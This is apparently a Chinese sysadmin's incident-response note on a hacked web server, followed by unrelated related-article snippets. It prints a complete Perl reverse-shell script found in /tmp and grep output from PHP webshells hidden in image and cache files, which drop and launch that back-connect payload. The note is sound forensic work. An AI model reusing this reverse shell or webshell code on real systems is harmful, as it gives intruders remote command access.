Web服务器捉虫速记

简介: 一服务器疑似被挂马,现象是从百度搜该站点,出来的结果大部分为色情网站。马上登录服务器(半夜好困啊)。

一服务器疑似被挂马,现象是从百度搜该站点,出来的结果大部分为色情网站。

马上登录服务器(半夜好困啊)。执行如下的步骤:

<!--[if !supportLists]-->1、  <!--[endif]-->检查系统帐号,看有没有异常帐号--如冒充系统帐号,改一个字母,看起来像系统帐号,混淆视听。有的家伙狡猾的干活,创建个帐号为“…”极端不易察觉。

<!--[if !supportLists]-->2、  <!--[endif]-->检查最近登录用户的ip:last 查看9月9号以后到目前的情况,经确认,有一个ip来路不对。

<!--[if !supportLists]-->3、  <!--[endif]-->检查系统初始化文件inittab,运行级别为3,为发现异常。一些hacker喜欢在这里下手,加上respawn这样的行,保证他的程序被杀后自动重启,不屈不挠地抗争系统管理员的绞杀。

<!--[if !supportLists]-->4、  <!--[endif]-->检查运行级别目录的脚本,ls –al /etc/rc3.d ,未见异常。

<!--[if !supportLists]-->5、  <!--[endif]-->检查自动任务 crontab –l ,root用户和web运行用户www各检查一遍,未见任何异常。

<!--[if !supportLists]-->6、  <!--[endif]-->检查历史记录history 发现有安装sendmail的情形,问客户是否有这个,答:不是自己装的。

<!--[if !supportLists]-->7、  <!--[endif]-->检查web目录,发现其权限为777,这可让人不太放心了,心中猜想,可能是从这里下手了。

<!--[if !supportLists]-->8、  <!--[endif]-->检查一下目录/tmp,发现有个文件不太对劲,文件名是spider_bc,打开看一下,是个perl脚本,其内容为:

[root@localhost   mysql]# more  /tmp/spider_bc

#!/usr/bin/perl

use   Socket;

$cmd=   "lynx";

$system=   'echo "`uname -a`";echo"`id`";/bin/sh';

$0=$cmd;

$target=$ARGV[0];

$port=$ARGV[1];

$iaddr=inet_aton($target)   || die("Error: $!\n");

$paddr=sockaddr_in($port,   $iaddr) || die("Error: $!\n");

$proto=getprotobyname('tcp');

socket(SOCKET,   PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");

connect(SOCKET,   $paddr) || die("Error: $!\n");

open(STDIN,   ">&SOCKET");

open(STDOUT,   ">&SOCKET");

open(STDERR,   ">&SOCKET");

system($system);

close(STDIN);

close(STDOUT);

close(STDERR);

   据客户开发人员反应,这文件删除以后,一会又自动生成了。

<!--[if !supportLists]-->9、  <!--[endif]-->初步怀疑是hacker利用web权限设置及程序漏洞上传了程序后,自动生成这个文件,于是进入到网站根目录,然后执行grep –r “spider” * ,片刻,结果出来了,下面节录部分:

[root@localhost www]# grep spider_bc * -r

/plusbak/viev.php:                        echo   File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '创建/tmp/spider_bc成功<br>' : '创建/tmp/spider_bc失败<br>';

/plusbak/viev.php:                        echo   Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].'   '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '执行命令失败';

/plusbak/viev.php:                        echo   File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '创建/tmp/spider_bc.c成功<br>' : '创建/tmp/spider_bc.c失败<br>';

/plusbak/viev.php:                          @unlink('/tmp/spider_bc.c');

/plusbak/viev.php:                        echo   Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &')   ? 'nc -l -n -v -p '.$_POST['yourport'] : '执行命令失败';

/developers/FCKeditor/editor/skins/images/images.php:                     echo   File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '创建/tmp/spider_bc成功<br>' : '创建/tmp/spider_bc失败<br>';

/developers/FCKeditor/editor/skins/images/images.php:                     echo   Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].'   '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '执行命令失败';

/developers/FCKeditor/editor/skins/images/images.php:                     echo   File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '创建/tmp/spider_bc.c成功<br>' : '创建/tmp/spider_bc.c失败<br>';

/developers/FCKeditor/editor/skins/images/images.php:                     @unlink('/tmp/spider_bc.c');

/developers/FCKeditor/editor/skins/images/images.php:                     echo   Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &')   ? 'nc -l -n -v -p '.$_POST['yourport'] : '执行命令失败';

/developers/developers/cache/default/index_sql.php   :                      echo   File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '创建/tmp/spider_bc成功<br>' : '创建/tmp/spider_bc失败<br>';

/developers/developers/cache/default/index_sql.php   :                      echo Exec_Run($perlpath.'   /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l   -n -v -p '.$_POST['yourport'] : '执行命令失败';

/developers/developers/cache/default/index_sql.php   :                      echo   File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '创建/tmp/spider_bc.c成功<br>' : '创建/tmp/spider_bc.c失败<br>';

/developers/developers/cache/default/index_sql.php   :                        @unlink('/tmp/spider_bc.c');

/developers/developers/cache/default/index_sql.php   :                      echo Exec_Run('/tmp/spider_bc   '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p   '.$_POST['yourport'] : '执行命令失败';

9、问题基本查明,告知各方,先简单恢复,明日再战。

目录
相关文章
|
2月前
|
XML 前端开发 JavaScript
PHP与Ajax在Web开发中的交互技术。PHP作为服务器端脚本语言,处理数据和业务逻辑
本文深入探讨了PHP与Ajax在Web开发中的交互技术。PHP作为服务器端脚本语言,处理数据和业务逻辑;Ajax则通过异步请求实现页面无刷新更新。文中详细介绍了两者的工作原理、数据传输格式选择、具体实现方法及实际应用案例,如实时数据更新、表单验证与提交、动态加载内容等。同时,针对跨域问题、数据安全与性能优化提出了建议。总结指出,PHP与Ajax的结合能显著提升Web应用的效率和用户体验。
66 3
|
3月前
|
Java PHP
PHP作为广受青睐的服务器端脚本语言,在Web开发中占据重要地位。理解其垃圾回收机制有助于开发高效稳定的PHP应用。
【10月更文挑战第1天】PHP作为广受青睐的服务器端脚本语言,在Web开发中占据重要地位。其垃圾回收机制包括引用计数与循环垃圾回收,对提升应用性能和稳定性至关重要。本文通过具体案例分析,详细探讨PHP垃圾回收机制的工作原理,特别是如何解决循环引用问题。在PHP 8中,垃圾回收机制得到进一步优化,提高了效率和准确性。理解这些机制有助于开发高效稳定的PHP应用。
59 3
|
5月前
|
API C# 开发框架
WPF与Web服务集成大揭秘:手把手教你调用RESTful API,客户端与服务器端优劣对比全解析!
【8月更文挑战第31天】在现代软件开发中,WPF 和 Web 服务各具特色。WPF 以其出色的界面展示能力受到欢迎,而 Web 服务则凭借跨平台和易维护性在互联网应用中占有一席之地。本文探讨了 WPF 如何通过 HttpClient 类调用 RESTful API,并展示了基于 ASP.NET Core 的 Web 服务如何实现同样的功能。通过对比分析,揭示了两者各自的优缺点:WPF 客户端直接处理数据,减轻服务器负担,但需处理网络异常;Web 服务则能利用服务器端功能如缓存和权限验证,但可能增加服务器负载。希望本文能帮助开发者根据具体需求选择合适的技术方案。
256 0
|
5月前
|
Rust 安全 开发者
惊爆!Xamarin 携手机器学习,开启智能应用新纪元,个性化体验与跨平台优势完美融合大揭秘!
【8月更文挑战第31天】随着互联网的发展,Web应用对性能和安全性要求不断提高。Rust凭借卓越的性能、内存安全及丰富生态,成为构建高性能Web服务器的理想选择。本文通过一个简单示例,展示如何使用Rust和Actix-web框架搭建基本Web服务器,从创建项目到运行服务器全程指导,帮助读者领略Rust在Web后端开发中的强大能力。通过实践,读者可以体验到Rust在性能和安全性方面的优势,以及其在Web开发领域的巨大潜力。
54 0
|
5月前
|
Java 数据库 API
JSF与JPA的史诗级联盟:如何编织数据持久化的华丽织锦,重塑Web应用的荣耀
【8月更文挑战第31天】JavaServer Faces (JSF) 和 Java Persistence API (JPA) 分别是构建Java Web应用的用户界面组件框架和持久化标准。结合使用JSF与JPA,能够打造强大的数据驱动Web应用。首先,通过定义实体类(如`User`)和配置`persistence.xml`来设置JPA环境。然后,在JSF中利用Managed Bean(如`UserBean`)管理业务逻辑,通过`EntityManager`执行数据持久化操作。
68 0
|
6天前
|
弹性计算 数据挖掘 应用服务中间件
阿里云轻量应用服务器68元与云服务器99元和199元区别及选择参考
目前阿里云有三款特惠云服务器,第一款轻量云服务器2核2G68元一年,第二款经济型云服务器2核2G3M带宽99元1年,第三款通用算力型2核4G5M带宽199元一年。有的新手用户并不是很清楚他们之间的区别,因此不知道如何选择。本文来介绍一下它们之间的区别以及选择参考。
195 86
|
16天前
|
机器学习/深度学习 人工智能 PyTorch
阿里云GPU云服务器怎么样?产品优势、应用场景介绍与最新活动价格参考
阿里云GPU云服务器怎么样?阿里云GPU结合了GPU计算力与CPU计算力,主要应用于于深度学习、科学计算、图形可视化、视频处理多种应用场景,本文为您详细介绍阿里云GPU云服务器产品优势、应用场景以及最新活动价格。
阿里云GPU云服务器怎么样?产品优势、应用场景介绍与最新活动价格参考
|
15天前
|
存储 运维 安全
阿里云弹性裸金属服务器是什么?产品规格及适用场景介绍
阿里云服务器ECS包括众多产品,其中弹性裸金属服务器(ECS Bare Metal Server)是一种可弹性伸缩的高性能计算服务,计算性能与传统物理机无差别,具有安全物理隔离的特点。分钟级的交付周期将提供给您实时的业务响应能力,助力您的核心业务飞速成长。本文为大家详细介绍弹性裸金属服务器的特点、优势以及与云服务器的对比等内容。
|
23天前
|
人工智能 JSON Linux
利用阿里云GPU加速服务器实现pdf转换为markdown格式
随着AI模型的发展,GPU需求日益增长,尤其是个人学习和研究。直接购置硬件成本高且更新快,建议选择阿里云等提供的GPU加速型服务器。
利用阿里云GPU加速服务器实现pdf转换为markdown格式
|
7天前
|
存储 人工智能 网络协议
浅聊阿里云倚天云服务器:c8y、g8y、r8y实例性能详解与活动价格参考
选择一款高性能、高性价比的云服务器对于企业而言至关重要,阿里云推出的倚天云服务器——c8y、g8y、r8y三款实例,它们基于ARM架构,采用阿里自研的倚天710处理器,并基于新一代CIPU架构,通过芯片快速路径加速手段,实现了计算、存储、网络性能的大幅提升。2025年,计算型c8y云服务器活动价格860.65元一年起,通用型g8y云服务器活动价格1187.40元一年起,内存型r8y云服务器活动价格1454.32元一年起。本文将为大家详细解析这三款实例的性能特点、应用场景以及最新的活动价格情况,帮助大家更好地了解阿里云倚天云服务器。

热门文章

最新文章